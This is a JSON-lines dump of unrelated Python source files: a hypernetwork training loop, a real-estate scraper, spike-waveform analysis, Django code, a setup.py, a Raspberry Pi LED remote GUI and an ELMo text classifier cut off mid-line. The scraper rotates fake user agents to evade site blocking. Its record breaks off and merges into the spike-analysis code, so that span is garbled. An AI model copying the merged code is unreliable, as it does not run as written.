optimD.zero_grad()\n optimE1.zero_grad()\n optimE2.zero_grad()\n optimD1.zero_grad()\n optimD2.zero_grad()\n\n l1w, l1b = E1(codes[0])\n l2w, l2b = E2(codes[1])\n l3w, l3b = D1(codes[2])\n l4w, l4b = D2(codes[3])\n layers_all = [l1w, l1b, l2w, l2b, l3w, l3b, l4w, l4b]\n clf_loss = 0\n for i, (layers) in enumerate(zip(*layers_all)):\n loss = train_nn(args, layers, data, targets)\n clf_loss += loss\n G_loss = clf_loss / args.batch_size\n G_loss.backward()\n total_hyper_loss = G_loss #+ (gp.sum().cuda())#mean().cuda()\n \n optimE.step()\n optimE1.step() \n optimE2.step()\n optimD1.step()\n optimD2.step()\n\n total_loss = total_hyper_loss.item()\n \n if epoch % 2 == 0:\n print ('**************************************')\n print ('AE-MD Loss: {}, D loss: {}'.format(total_hyper_loss, d_loss))\n print ('**************************************')\n #if epoch > 100:\n with torch.no_grad():\n #test_far_data(mixer, W1, W2)\n get_points(mixer, [E1, E2, D1, D2], epoch) \n #utils.save_hypernet_toy(args, [mixer, netD, W1, W2], test_acc)\n\n\nif __name__ == '__main__':\n args = load_args()\n if not os.path.exists(args.save_dir):\n os.makedirs(args.save_dir)\n #import arch.toy_tiny_gen as models\n import arch.ae_models as models\n train(args)\n","sub_path":"hyperAE.py","file_name":"hyperAE.py","file_ext":"py","file_size_in_byte":11234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"322445970","text":"import requests\nfrom bs4 import BeautifulSoup\n#from selenium import webdriver\nimport webbrowser\nimport random, sys\nfrom time import sleep as wait\nimport pandas as pd\nimport re #is this even used?\nimport atexit\n\n\"\"\"\n#https://www.geeksforgeeks.org/how-to-exit-a-python-script/\ndef exit_handler():\n print('My application is ending!')\natexit.register(exit_handler)\nprint('GFG!')\nsys.exit()\n\"\"\"\n#https://www.scrapehero.com/how-to-rotate-proxies-and-ip-addresses-using-python-3/\n#try to do this so that the code can constantly keep working instead of breaking every 10\n\n#if the code keeps running, it will get copies of its self but will get a few morer from the web\n\n#https://pypi.org/project/fake-useragent/\n#antiblocking measures\nfrom fake_useragent import UserAgent\nua = UserAgent()\nUser_Agent = str(ua.random) #always gets a random UserAgent\n#User_Agent = \"Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36\"\n#print(User_Agent)\n#User_Agent = \"*\"\ntownname_ = \"Bayonne\"\n#townname_ = 'Guttenberg'\n#townname_ = 'North Bergen'\n#townname_ = 'Union City'\n#townname_ = 'Jersey City'\n#townname_ = \"Newark\"\n#.capitalize() capitalizes the word\n#townname_ = str(input(\"Name of Town: \")).lower()\n#townname_ = \"East Rutherford\"\n\n\ntry:\n townname = townname_.split(\" \")\n townname_space = townname[0].capitalize()+\" \"+townname[1].capitalize()\n townname = townname[0].capitalize()+\"-\"+townname[1].capitalize() #townname used for zumper\n #rtownname = townname[0]+#townname used for realtor.com\nexcept:\n townname = townname_.capitalize()\n townname_space = townname\n pass\n\n\ntry:\n # finds dataframe \n folders = \"/Users/juanm./Documents/Coding/Data Science?/github/Webscrapper-Real-Estate/Not Working/\"\n og_filename = townname+'.csv'\n og_df = pd.read_csv(folders+og_filename) \n # reads the already there file\n i = og_df.i.to_list() #creates i into its own list\n #start = og_df[\"i\"].tail(1)\n #start = len(og_df) #finds the length of the dataframe\n \"\"\"\n if i[-1] 0:\n try: # Use threshold to compute half-max.\n y = np.array(s)\n dvdt = np.diff(y)\n trigger = dvdt.max()/10\n x_loc = int(np.where(dvdt >= trigger)[0][0])\n thresh = (s[x_loc]+s[x_loc+1])/2\n mid = (high+thresh)/2\n except: # Use minimum value to compute half-max.\n sciunit.log((\"Could not compute threshold; using pre-spike \"\n \"minimum to compute width\"))\n low = np.min(s[:x_high])\n mid = (high+low)/2\n n_samples = sum(s>mid) # Number of samples above the half-max.\n widths.append(n_samples)\n widths = np.array(widths,dtype='float')\n if n_spikes:\n # Convert from samples to time.\n widths = widths*spike_waveforms.sampling_period\n return widths\n\ndef spikes2thresholds(spike_waveforms):\n \"\"\"\n IN:\n spike_waveforms: Spike waveforms, e.g. from get_spike_waveforms().\n neo.core.AnalogSignal\n OUT:\n 1D numpy array of spike thresholds, specifically the membrane potential\n at which 1/10 the maximum slope is reached.\n\n If the derivative contains NaNs, probably because vm contains NaNs\n Return an empty list with the appropriate units\n\n \"\"\"\n\n n_spikes = spike_waveforms.shape[1]\n thresholds = []\n for i in range(n_spikes):\n s = spike_waveforms[:,i].squeeze()\n s = np.array(s)\n dvdt = np.diff(s)\n import math\n for j in dvdt:\n if math.isnan(j):\n return thresholds * spike_waveforms.units\n\n trigger = dvdt.max()/10\n x_loc = np.where(dvdt >= trigger)[0][0]\n thresh = (s[x_loc]+s[x_loc+1])/2\n thresholds.append(thresh)\n return thresholds * spike_waveforms.units\n","sub_path":"neuronunit/neuronunit/capabilities/spike_functions.py","file_name":"spike_functions.py","file_ext":"py","file_size_in_byte":4592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"606119862","text":"# -*- coding:utf-8 -*-\nfrom django.shortcuts import render, get_object_or_404\n\nfrom main.models import Category, Product\n\n\ndef category(request, slug):\n c = get_object_or_404(Category, slug=slug)\n\n products = Product.objects.filter(category=c)\n\n return render(request, 'category.html', {\n 'category': c,\n 'products': products\n })\n","sub_path":"main/views/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"418322937","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"The setup script.\"\"\"\n\nimport sys\nfrom setuptools import setup, find_packages\n\n__author__ = \"XESS Corp.\"\n__email__ = \"info@xess.com\"\n__version__ = \"0.4.0\"\n\nif \"sdist\" in sys.argv[1:]:\n with open(\"zyc/pckg_info.py\", \"w\") as f:\n for name in [\"__version__\", \"__author__\", \"__email__\"]:\n f.write(\"{} = '{}'\\n\".format(name, locals()[name]))\n\nwith open(\"README.rst\") as readme_file:\n readme = readme_file.read()\n\nwith open(\"HISTORY.rst\") as history_file:\n history = history_file.read()\n\nrequirements = [\n \"skidl >= 0.0.27\",\n \"kinparse >= 0.1.0\",\n 'enum34; python_version < \"3.0\"',\n \"wxpython >= 4.0.7\",\n \"pykicad\",\n]\n\nsetup_requirements = []\n\ntest_requirements = []\n\nsetup(\n author=__author__,\n author_email=__email__,\n version=__version__,\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Manufacturing\",\n \"License :: OSI Approved :: MIT License\",\n \"Natural Language :: English\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.4\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n ],\n description=\"A GUI for searching and selecting parts and footprints for use in SKiDL.\",\n entry_points={\"gui_scripts\": [\"zyc = zyc.zyc:main\"]},\n install_requires=requirements,\n license=\"MIT license\",\n long_description=readme + \"\\n\\n\" + history,\n include_package_data=True,\n keywords=\"zyc\",\n name=\"zyc\",\n packages=find_packages(include=[\"zyc\"]),\n setup_requires=setup_requirements,\n test_suite=\"tests\",\n tests_require=test_requirements,\n url=\"https://github.com/xesscorp/zyc\",\n zip_safe=False,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"104847583","text":"#!/usr/bin/env python3\nfrom tkinter import *\nfrom tkinter.colorchooser import *\nimport sys\nimport pigpio\nimport subprocess\nimport threading\nimport time\n\npi = pigpio.pi()\n\n#global variables\nLedOn = False\neffectOn = False\nsizeX = 800\nsizeY = 480\nLEDRED=0\nLEDGREEN=0\nLEDBLUE=0\npin = [17,22,27]\neffectChosen = 0\n\n\n\ndef exit():\n pi.set_PWM_dutycycle(pin[0], 0)\n pi.set_PWM_dutycycle(pin[1], 0)\n pi.set_PWM_dutycycle(pin[2], 0)\n sys.exit()\n\n#forget object placement\ndef forget(list):\n for i in list:\n i.place_forget()\n\n#place objects into frame\ndef place(list1, list2):\n j = 0\n if((len(list2) / len(list1)) == 2):\n for i in list1:\n i.place(x=list2[j], y=list2[j+1])\n j+=2\n else:\n for i in list1:\n i.place(x=list2[j], y=list2[j+1], width=list2[j+2])\n j+=3\n\n#translate rgb colour to hex\ndef translate(rgb):\n return \"#%02x%02x%02x\" % rgb\n\n#samsung menu\ndef Samsung():\n forget(menuList)\n place(samsungList, samsungListCoord)\n\n#led menu\ndef Led():\n forget(menuList)\n forget(coloursList)\n forget(effectsList)\n place(ledList, ledListCoord)\n\n#colour pick menu\ndef Colours():\n forget(ledList)\n place(coloursList, coloursListCoord)\n\n#update frame to show colour\ndef updateColour(s):\n colourFrame.configure(bg= translate((colourR.get(), colourG.get(), colourB.get())))\n\ndef selectColour():\n if LedOn:\n subprocess.call([\"sudo\", \"pkill\", \"-f\", \"ledEffect.py\"])\n global effectOn\n effectOn = False\n global LEDRED\n LEDRED = colourR.get()\n pi.set_PWM_dutycycle(pin[0], LEDRED)\n global LEDGREEN\n LEDGREEN = colourG.get()\n pi.set_PWM_dutycycle(pin[1], LEDGREEN)\n global LEDBLUE\n LEDBLUE = colourB.get()\n pi.set_PWM_dutycycle(pin[2], LEDBLUE)\n\ndef LedPower():\n global LedOn\n if LedOn:\n subprocess.call([\"sudo\", \"pkill\", \"-f\", \"ledEffect.py\"])\n pi.set_PWM_dutycycle(pin[0], 0)\n pi.set_PWM_dutycycle(pin[1], 0)\n pi.set_PWM_dutycycle(pin[2], 0)\n LedOn = False\n else:\n LedOn = True\n selectColour()\n\ndef sleep():\n pass\n\n#effects menu\ndef Effects():\n forget(ledList)\n place(effectsList, effectsListCoord)\n\ndef callEffect():\n subprocess.call([\"sudo\", \"python3\", \"/home/pi/Desktop/github/Desktop-Remote/Python(Rasp)/ledEffect.py\", str(effectChosen)])\n\ndef selectEffect():\n if LedOn:\n subprocess.call([\"sudo\", \"pkill\", \"-f\", \"ledEffect.py\"])\n effectOn = True\n t1 = threading.Thread(target=callEffect)\n t1.start()\n\ndef runEffect(li, eff):\n r = li[eff][0]\n g = li[eff][1]\n b = li[eff][2]\n i = 3\n global effectChosen\n effectChosen = eff\n while i < len(li[eff]):\n red = li[eff][i%len(li[eff])]\n green = li[eff][(i+1)%len(li[eff])]\n blue = li[eff][(i+2)%len(li[eff])]\n i+=3\n while ( r != red or g != green or b != blue ):\n if ( r < red ):\n r += 1\n if ( r > red ):\n r -= 1\n\n if ( g < green ):\n g += 1\n if ( g > green ):\n g -= 1\n\n if ( b < blue ):\n b += 1\n if ( b > blue ):\n b -= 1\n\n effectColourFrame.after(5,sleep())\n effectColourFrame.configure(bg= translate((r,g,b)))\n root.update()\n\ndef pBtn():\n PowerB.place(x=50, y=380)\n\n#main menu\ndef menu():\n forget(samsungList)\n forget(ledList)\n background_label.place(x=0, y=0, relwidth=1, relheight=1)\n place(menuList, menuListCoord)\n\n# def tick():\n# time1.set(time.strftime(\"%H:%M:%S\"))\n# clock.after(500, tick)\n\nroot = Tk()\nroot.geometry(str(sizeX) + \"x\" + str(sizeY))\nroot.configure(bg=\"black\")\nroot.attributes(\"-fullscreen\", True)\nroot.config(cursor=\"none\")\n\ntitle = Frame(root).place(width = sizeX, height = 150, x = 0, y = 0)\nversion = Frame(root).place(width = sizeX, height = sizeY, x = 0, y = 0)\n# time = Frame(root).place(width = sizeX, height = sizeY, x = 0, y = 0)\nmain = Frame(root)\n\nmain.place(width = sizeX, height = sizeY, x = 0, y = 0)\nbg1 = PhotoImage(file=\"/home/pi/Desktop/github/Desktop-Remote/Python(Rasp)/images/bg1.png\")\nbackground_label = Label(main, image=bg1)\npwr = PhotoImage(file=\"/home/pi/Desktop/github/Desktop-Remote/Python(Rasp)/images/pwrBtn.png\")\npwr2 = PhotoImage(file=\"/home/pi/Desktop/github/Desktop-Remote/Python(Rasp)/images/pwr2.png\")\nvolUp = PhotoImage(file=\"/home/pi/Desktop/github/Desktop-Remote/Python(Rasp)/images/volUp.png\")\nvolDown = PhotoImage(file=\"/home/pi/Desktop/github/Desktop-Remote/Python(Rasp)/images/volDown.png\")\nvolMute = PhotoImage(file=\"/home/pi/Desktop/github/Desktop-Remote/Python(Rasp)/images/volMute.png\")\nplus = PhotoImage(file=\"/home/pi/Desktop/github/Desktop-Remote/Python(Rasp)/images/plus.png\")\nminus = PhotoImage(file=\"/home/pi/Desktop/github/Desktop-Remote/Python(Rasp)/images/minus.png\")\nrgbImg = PhotoImage(file=\"/home/pi/Desktop/github/Desktop-Remote/Python(Rasp)/images/rgbImg2.png\")\nrgbPic = Label(root, image=rgbImg)\n\n# root.after(1000, tick)\n\n#Labels\n# time1 = StringVar()\n# time1.set(time.strftime(\"%H:%M:%S\"))\ntitle = Label(title, text=\"Desktop Remote\", bg=\"#ff0c85\", fg=\"#ffc9e3\", font=(\"Arial\", 44))\nversion = Label(version, text=\"v2.0\", bg=\"#ff0c85\", fg=\"#ffc9e3\", font=(\"Arial\", 20))\n# clock = Label(main, textvariable=time1, bg=\"#ff0c85\", fg=\"#ffc9e3\", font=(\"Arial\", 20))\n\n#----Menu------------------------------------------------------------------------------------------------------------\nLedB = Button(main, text=\"LED\", bg=\"white\", fg=\"black\", font=(\"Arial\", 20), command=Led)\nSamsungB = Button(main, text=\"Samsung\", bg=\"white\", fg=\"black\", font=(\"Arial\", 20), command=Samsung)\n\nPowerB = Button(image=pwr, command=exit)\nPowerB[\"bg\"] = \"black\"\nPowerB[\"border\"] = \"0\"\n\nmenuList = [title, version, LedB, SamsungB]\nmenuListCoord = [140,0,520 , 720,440,80 , 100,240,200 , 500,240,200]\n\n#----Universal------------------------------------------------------------------------------------------------------------\nbackBtn = Button(main, text=\"BACK\", bg=\"black\", fg=\"white\", font=(\"Arial\", 20), command=menu)\nbackLedBtn = Button(main, text=\"BACK\", bg=\"black\", fg=\"white\", font=(\"Arial\", 20), command=Led)\n\n#----Samsung------------------------------------------------------------------------------------------------------------\nSamPwrB = Button(image=pwr2)\nSamSource = Button(main, text=\"Source\", bg=\"white\", fg=\"black\", font=(\"Arial\", 20))\nSamVolumeUp = Button(image=volUp)\nSamVolumeDown = Button(image=volDown)\nSamVolumeMute = Button(image=volMute)\nSamPlus = Button(image=plus)\nSamMinus = Button(image=minus)\n\nsamsungList = [SamPwrB, SamSource, SamVolumeUp, SamVolumeDown, SamVolumeMute, SamPlus, SamMinus, backBtn]\nsamsungListCoord = [50,120 , 480,75 , 240,60, 240,340 , 240,200 , 490,200 , 490,340 , 50,50]\n\n#----LED------------------------------------------------------------------------------------------------------------\nLedPwrB = Button(image=pwr2, command=LedPower)\nLedColours = Button(main, text=\"Colours\", bg=\"white\", fg=\"black\", font=(\"Arial\", 20), command=Colours)\nLedEffects = Button(main, text=\"Effects\", bg=\"white\", fg=\"black\", font=(\"Arial\", 20), command=Effects)\n\nledList = [LedPwrB, rgbPic, LedColours, LedEffects, backBtn]\nledListCoord = [50,120 , 200,75 , 275,350 , 550,350 , 50,50]\n\n#----Colours------------------------------------------------------------------------------------------------------------\ncolourR = Scale(main, bg=\"#f24f43\", fg=\"white\", from_=255, to=0, showvalue=0, font=(\"Arial\", 12), length=200, width=50, command=updateColour)\ncolourR.set(255)\ncolourG = Scale(main, bg=\"#47ce35\", fg=\"white\", from_=255, to=0, showvalue=0, font=(\"Arial\", 12), length=200, width=50, command=updateColour)\ncolourG.set(255)\ncolourB = Scale(main, bg=\"#3553ce\", fg=\"white\", from_=255, to=0, showvalue=0, font=(\"Arial\", 12), length=200, width=50, command=updateColour)\ncolourB.set(255)\nbrightness = Scale(main, bg=\"black\", fg=\"white\", from_=1, to=256, showvalue=0, font=(\"Arial\", 12), orient=HORIZONTAL, length=200, width=30)\nbrightness.set(255)\ncolourBlackFrame = Frame(root, width=110, height=110, bg=\"#52565e\")\ncolourFrame = Frame(root, width=100, height=100, bg= translate((colourR.get(), colourG.get(), colourB.get())))\nsetColour = Button(main, text=\"Set Colour\", bg=\"white\", fg=\"black\", font=(\"Arial\", 20), command=selectColour)\n\ncoloursList = [LedPwrB, colourR , colourG , colourB, colourFrame, colourBlackFrame, setColour, backLedBtn]\ncoloursListCoord = [50,120 , 200,125 , 300,125 , 400,125 , 505,140 , 500,135 , 480,270 , 50,50]\n\n#----Effects------------------------------------------------------------------------------------------------------------\neffectColourBlackFrame = Frame(root, width=110, height=110, bg=\"#52565e\")\neffectColourFrame = Frame(root, width=100, height=100, bg=\"white\")\nclrEffectList = [\n[255,0,255,0,255,255,255,0,255]\n,[255,0,0 , 255,128,0 , 255,255,0 , 128,255,0 , 0,255,0 , 0,255,128 , 0,255,255 , 0,128,255 , 0,0,255 , 128,0,255 , 255,0,255 , 255,0,255 , 255,0,128 , 255,0,0]\n,[255,0,255,0,0,0,255,0,255]\n,[128,0,255,0,0,0,128,0,255]\n,[0,255,255,0,0,0,0,255,255]\n,[255,0,255,128,0,255,255,0,255]\n]\nEffect1 = Button(main, text=\"Effect1\", bg=\"white\", fg=\"black\", font=(\"Arial\", 20), command=lambda: runEffect(clrEffectList, 0))\nEffect2 = Button(main, text=\"Effect2\", bg=\"white\", fg=\"black\", font=(\"Arial\", 20), command=lambda: runEffect(clrEffectList, 1))\nEffect3 = Button(main, text=\"Effect3\", bg=\"white\", fg=\"black\", font=(\"Arial\", 20), command=lambda: runEffect(clrEffectList, 2))\nEffect4 = Button(main, text=\"Effect4\", bg=\"white\", fg=\"black\", font=(\"Arial\", 20), command=lambda: runEffect(clrEffectList, 3))\nEffect5 = Button(main, text=\"Effect5\", bg=\"white\", fg=\"black\", font=(\"Arial\", 20), command=lambda: runEffect(clrEffectList, 4))\nEffect6 = Button(main, text=\"Effect6\", bg=\"white\", fg=\"black\", font=(\"Arial\", 20), command=lambda: runEffect(clrEffectList, 5))\nsetEffect = Button(main, text=\"Set Effect\", bg=\"white\", fg=\"black\", font=(\"Arial\", 20), command=selectEffect)\n\neffectsList = [LedPwrB, Effect1, Effect2, Effect3, Effect4, Effect5, Effect6, effectColourFrame, effectColourBlackFrame, setEffect, backLedBtn]\neffectsListCoord = [50,120 , 200,150 , 350,150 , 500,150 , 200,250 , 350,250 , 500,250 , 650,130 , 645,125 , 630,250 , 50,50]\n\nmenu()\npBtn()\nroot.mainloop()\n","sub_path":"framework/reign.py","file_name":"reign.py","file_ext":"py","file_size_in_byte":10391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"449853273","text":"\nfrom django import template\nfrom django.urls import reverse\nfrom django.utils.safestring import mark_safe\nfrom django.http.request import QueryDict\n\nregister = template.Library()\n\n@register.simple_tag\ndef show_info(request):\n path = request.path\n if path == reverse('customer'):\n return mark_safe('')\n else:\n return mark_safe('')\n\n# 拼接路径,编辑之后跳转回原页面\n@register.simple_tag\ndef reverse_url(url_name,id,request):\n\n # /editcustomer/3/?next=/customers/?page=4\n path = request.get_full_path()\n query_dict_obj = QueryDict(mutable=True)\n query_dict_obj['next'] = path #\n encode_url = query_dict_obj.urlencode() #next=/customers/?search_field=qq__contains&keyword=1&page=4\n # url编码:\n #next=%2Fcustomers%2F%3Fsearch_field%3Dqq__contains%26keyword%3D1%26page%3D4\n #next=%2Fcustomers%2F%3Fsearch_field%3Dqq__contains%26keyword%3D1%26page%3D4\n\n\n # ?a=1&b=2\n # request.GET = queryDict({'a':1,'b':2})\n # request.GET.urlencode() -- a=1&b=2\n\n #queryDict({'next':'/customers/?search_field=qq__contains&keyword=1&page=4'})\n\n\n #/customers/?page=4 #/customers/?search_field=qq__contains&keyword=1&page=4\n prefix_path = reverse(url_name,args=(id,)) #/editcustomer/3/\n\n full_path = prefix_path + '?' + encode_url\n\n return full_path\n# print(type(request.GET)) # request.GET.urlencode()\n##http://127.0.0.1:8000/editcustomer/116/?next=/customers/?search_field=qq__contains&keyword=1&page=4\n\n# 跳转回的路径: http://127.0.0.1:8000/customers/?search_field=qq__contains&keyword=1&page=4","sub_path":"oldbeast/insects/templatetags/mytag.py","file_name":"mytag.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"601945433","text":"from enum import Enum\n\nTRANSLATIONS = {\"triangle\": \"TRIANGLE\", \"cercle\": \"CIRCLE\", \"carre\": \"SQUARE\", \"pentagone\": \"PENTAGON\"}\n\n\nclass Shape(str, Enum):\n TRIANGLE = \"TRIANGLE\"\n SQUARE = \"SQUARE\"\n CIRCLE = \"CIRCLE\"\n PENTAGON = \"PENTAGON\"\n\n @staticmethod\n def translate(shape):\n return Shape(TRANSLATIONS.get(shape.lower()))\n","sub_path":"anesthetic/blood/shape.py","file_name":"shape.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"63232004","text":"\"\"\"\nThis script prepares the wsc data into a csv file, ready for annotationg\n\"\"\"\n\nimport argparse\n\nfrom winohard.utils import read_jsonl, write_jsonl\n\n\ndef find_unique(s1, s2):\n s1_split = s1.split()\n s2_split = s2.split()\n\n for w1, w2 in zip(s1_split, s2_split):\n if w1 != w2:\n return w1, w2\n\n\ndef main():\n parse = argparse.ArgumentParser(\"\")\n parse.add_argument(\"--in_data\", type=str, help=\"jsonl file\",\n default=\"/home/lazary/workspace/thesis/winohard/data/wsc/wsc.jsonl\")\n parse.add_argument(\"--out_data\", type=str, help=\"jsonl file\",\n default=\"/home/lazary/workspace/thesis/winohard/data/lms/wsc_lm.jsonl\")\n\n args = parse.parse_args()\n\n data = read_jsonl(args.in_data)\n\n # ignoring the triplet sentence, to keep the format valid\n data = data[:254] + data[255:]\n\n\n coupled_data = []\n for i in range(0, len(data) - 1, 2):\n couple = data[i], data[i + 1]\n coupled_data.append(couple)\n\n out_data = []\n\n for c1, c2 in coupled_data:\n s1 = c1['sentence']\n s2 = c2['sentence']\n w1, w2 = find_unique(s1, s2)\n s1_replace = s1.replace(w1, '[MASK]')\n option1 = c1['option1']\n s1_replace = s1_replace.replace('_', option1)\n\n s2_replace = s2.replace(w2, '[MASK]')\n option1 = c2['option2']\n s2_replace = s2_replace.replace('_', option1)\n\n if not s1_replace.endswith('.'):\n s1_replace += '.'\n if not s2_replace.endswith('.'):\n s2_replace += '.'\n\n if w1.endswith('.'):\n w1 = w1[:-1]\n if w2.endswith('.'):\n w2 = w2[:-1]\n\n # print(w1, s1_replace)\n # print(w2, s2_replace)\n if s1_replace.count('[MASK]') > 1:\n # print(w1, s1_replace)\n continue\n if s2_replace.count('[MASK]') > 1:\n continue\n\n out_data.append({'s1': s1_replace, 's2': s2_replace,\n 'ans1': w1, 'ans2': w2})\n\n write_jsonl(out_data, args.out_data)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"winohard/transform_examples.py","file_name":"transform_examples.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"648460606","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nhttps://github.com/gaussic/text-classification\nThis scripts is to train on 500 samples, and test on the annotated samples.\nRun with python3 (****py36**** on tangra)\nWe didn't implement cross validation,\nbut simply run `python cnn_mxnet.py` for multiple times,\nthe average accuracy is close to 78%.\n\n\n# below is the original readme. #####\nThis example demonstrates the use of Conv1D for CNN text classification.\nOriginal paper could be found at: https://arxiv.org/abs/1408.5882\n\nThis is the baseline model: CNN-rand.\n\nThe implementation is based on PyTorch.\n\n\n\n\n\n\n\"\"\"\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader, TensorDataset\nimport numpy as np\nfrom sklearn import metrics\n\nfrom mr_loader import Corpus, read_vocab, process_text\n\nimport os\nimport time\nfrom datetime import timedelta\n\nfrom allennlp.modules.elmo import Elmo, batch_to_ids\n\n\n\n\noptions_file = \"/home/lily/zl379/Playing/bilm-tf/mmc_new/options.json\"\nweight_file = \"/home/lily/zl379/Playing/bilm-tf/dump/weights.hdf5\"\n\ntrain_path = '/home/lily/zl379/BioNLP/Disambiguation/50_normal/'\n\n\ntest_path = '/home/lily/zl379/BioNLP/test_data/'\n\ntesting_abbre = ['PDA','SBP']\n\n\nsave_path = 'checkpoints_balance' # model save path\nif not os.path.exists(save_path):\n os.mkdir(save_path)\n\n\nuse_cuda = torch.cuda.is_available()\n\n\nclass TCNNConfig(object):\n \"\"\"\n CNN Parameters\n \"\"\"\n\n file_path = train_path\n test_path = test_path\n # set abbreviation\n abbre = 'AB' # as default\n\n embedding_dim = 64 # embedding vector size\n seq_length = 200 # maximum length of sequence\n vocab_size = 8000 # most common words\n\n num_filters = 100 # number of the convolution filters (feature maps)\n kernel_sizes = [3, 4, 5] # three kind of kernels (windows)\n hidden_dim = 64 # hidden size of fully connected layer\n\n dropout_prob = 0.5 # how much probability to be dropped\n learning_rate = 1e-3 # learning rate\n batch_size = 50 # batch size for training\n num_epochs = 20 # total number of epochs\n\n num_classes = 3 # number of classes\n\n dev_split = 0.2 # percentage of dev data\n\n model_file = '' # save path\n k_fold = 0\n\nclass TextCNN(nn.Module):\n \"\"\"\n CNN text classification model, based on the paper.\n \"\"\"\n\n def __init__(self, config):\n super(TextCNN, self).__init__()\n\n V = config.vocab_size\n E = config.embedding_dim\n Nf = config.num_filters\n Ks = config.kernel_sizes\n C = config.num_classes\n Dr = config.dropout_prob\n\n # elmo\n self.elmo = Elmo(options_file, weight_file, 2, dropout=0, requires_grad=False) # default is False\n\n # self.embedding = nn.Embedding(V, E) # embedding layer\n\n\n # three different convolutional layers\n self.convs = nn.ModuleList([nn.Conv1d(E, Nf, k) for k in Ks])\n self.dropout = nn.Dropout(Dr) # a dropout layer\n self.fc1 = nn.Linear(3 * Nf, C) # a dense layer for classification\n\n @staticmethod\n def conv_and_max_pool(x, conv):\n \"\"\"Convolution and global max pooling layer\"\"\"\n return F.relu(conv(x).permute(0, 2, 1).max(1)[0])\n\n def forward(self, inputs):\n\n #add elmo\n\n elmo_embedding = self.elmo(inputs)\n sents = elmo_embedding['elmo_representations'][-1]\n\n # print ('Shape for elmo...',sents.size()) # should be [50, 200, 64] , but now it is [50, 172, 64]\n\n # Conv1d takes in (batch, channels, seq_len), but raw embedded is (batch, seq_len, channels)\n embedded = sents.permute(0, 2, 1)\n\n x = [self.conv_and_max_pool(embedded, k) for k in self.convs] # convolution and global max pooling\n x = self.fc1(self.dropout(torch.cat(x, 1))) # concatenation and dropout\n\n return x\n\n\ndef get_time_dif(start_time):\n \"\"\"\n Return the time used since start_time.\n \"\"\"\n end_time = time.time()\n time_dif = end_time - start_time\n return timedelta(seconds=int(round(time_dif)))\n\n\ndef evaluate(data, model, loss):\n \"\"\"\n Evaluation, return accuracy and loss\n \"\"\"\n model.eval() # set mode to evaluation to disable dropout\n data_loader = DataLoader(data, batch_size=50)\n\n data_len = len(data)\n total_loss = 0.0\n y_true, y_pred = [], []\n\n for data, label in data_loader:\n data, label = Variable(data, volatile=True), Variable(label, volatile=True)\n if use_cuda:\n data, label = data.cuda(), label.cuda()\n\n output = model(data)\n losses = loss(output, label)\n\n total_loss += losses.data[0]\n pred = torch.max(output.data, dim=1)[1].cpu().numpy().tolist()\n y_pred.extend(pred)\n y_true.extend(label.data)\n\n acc = (np.array(y_true) == np.array(y_pred)).sum()\n return float(acc) / float(data_len), total_loss / data_len\n\n\ndef train(config):\n \"\"\"\n Train and evaluate the model with training and validation data.\n \"\"\"\n print('Loading data...')\n start_time = time.time()\n\n corpus = Corpus(config.file_path, config.test_path, config.abbre, config.seq_length, config.vocab_size)\n config.num_classes = corpus.num_classes\n print(corpus)\n config.vocab_size = len(corpus.words) #useless now\n\n\n\n config.model_file = config.model_file + '.pk'\n train_data = TensorDataset(torch.LongTensor(corpus.x_train_ids), torch.LongTensor(corpus.y_train))\n test_data = TensorDataset(torch.LongTensor(corpus.x_test_ids), torch.LongTensor(corpus.y_test))\n\n\n print('Configuring CNN model...')\n model = TextCNN(config)\n print(model)\n\n if use_cuda:\n model.cuda()\n\n # optimizer and loss function\n criterion = nn.CrossEntropyLoss(size_average=False)\n optimizer = optim.Adam(model.parameters(), lr=config.learning_rate)\n\n # set the mode to train\n print(\"Training and evaluating...\")\n\n best_acc = 0.0\n for epoch in range(config.num_epochs):\n # load the training data in batch\n model.train()\n train_loader = DataLoader(train_data, batch_size=config.batch_size)\n for x_batch, y_batch in train_loader:\n inputs, targets = Variable(x_batch), Variable(y_batch)\n print ('INPUT...',inputs.size())\n if use_cuda:\n inputs, targets = inputs.cuda(), targets.cuda()\n\n optimizer.zero_grad()\n outputs = model(inputs) # forward computation\n loss = criterion(outputs, targets)\n\n # backward propagation and update parameters\n loss.backward()\n optimizer.step()\n\n # evaluate on both training and test dataset\n train_acc, train_loss = evaluate(train_data, model, criterion)\n test_acc, test_loss = evaluate(test_data, model, criterion)\n\n if test_acc > best_acc:\n # store the best result\n best_acc = test_acc\n improved_str = '*'\n torch.save(model.state_dict(), config.model_file)\n else:\n improved_str = ''\n\n time_dif = get_time_dif(start_time)\n msg = \"Epoch {0:3}, Train_loss: {1:>7.2}, Train_acc {2:>6.2%}, \" \\\n + \"Test_loss: {3:>6.2}, Test_acc {4:>6.2%}, Time: {5} 